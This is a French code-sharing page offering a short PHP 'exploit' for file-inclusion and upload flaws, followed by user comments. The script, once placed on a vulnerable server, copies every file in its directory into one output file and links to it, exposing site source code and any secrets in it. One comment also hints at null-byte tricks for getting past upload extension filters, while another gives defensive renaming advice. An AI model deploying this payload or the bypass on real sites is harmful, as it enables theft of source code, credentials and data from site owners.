Exploi faille include & upload

Soyez le premier à donner votre avis sur cette source.

Snippet vu 19 289 fois - Téléchargée 27 fois

Contenu du snippet

faille include coté serveur, un clik=le code (lecture des fichiers!)

Source / Exemple :


<?

$dir=opendir('.');
$output="code.own";

$fpout = fopen($output, "a");

while ($file = readdir($dir))
 {
  if ($fpout)
  {
    if ((filetype($file) == "dir") || ($file == $output))
    ;
    else
    {
      $fpin = fopen($file, "r");
      if ($fpin)
      {
        fputs($fpout, "\n".$file."\n");

        while (!feof($fpin))
        {
            $line=fgets($fpin,1024);
            fputs($fpout,$line);
        }
        fclose($fpin);
      }
    }
  }
 }
 echo "<a href=$output> Show source :-)</a>";
 
closedir($dir);
fclose($fpout);

?>

Conclusion :


La securité avant tout!

A voir également

Ajouter un commentaire

Commentaires

Shinikaka
Messages postés
4
Date d'inscription
dimanche 3 juin 2007
Statut
Membre
Dernière intervention
2 février 2012
-
Solution la plus efficace pour vous protéger (upload de fichier je parle)
Comme l'a dit renaud288 en 2004 :
- addslashes dans les post et get
- parser le contenu du fichier (pas obligatoire...) pour y trouver un code php

L'ultime solution :
- Renommer le fichier recu en quelque chose . extension obligatoire
exemple :
j'upload script.php
La page qui analyse et traite l'upload le renomme en asdj012.png
TOUJOURS RENOMMER PAR L'EXTENSSION DESIREE ! et voila vous êtes protégé... mais jamais a 100%
Shinikaka
Messages postés
4
Date d'inscription
dimanche 3 juin 2007
Statut
Membre
Dernière intervention
2 février 2012
-
Pour ceux qui ont suivis le sujet de discussion ...
Même si tu n'autorise que des fichier .jpg, ou .png, bref des images, il y a des façons de contourner cette protection.

Les vrais complèterons la suite : nu**b**e ... le truc avec un % :) voyez ?
Je ne voudrais pas être plus explicite.
Si vous savez de quoi je parle, vous n'avez rien a faire ici et connaissez ces méthodes de contournement.
Si vous ne savez pas de quoi je parle, ce script pourrait ne jamais vous être utile, donc vous n'avez rien a faire ici non plus :)
Steph448
Messages postés
1
Date d'inscription
samedi 8 août 2009
Statut
Membre
Dernière intervention
8 août 2009
-
xD je ne mis connais pas super bien en ordi, vous pouvez l'expliquer en français san le langage ordi?
NKWolf
Messages postés
39
Date d'inscription
samedi 28 août 2004
Statut
Membre
Dernière intervention
11 janvier 2007
-
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)
NKWolf
Messages postés
39
Date d'inscription
samedi 28 août 2004
Statut
Membre
Dernière intervention
11 janvier 2007
-
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.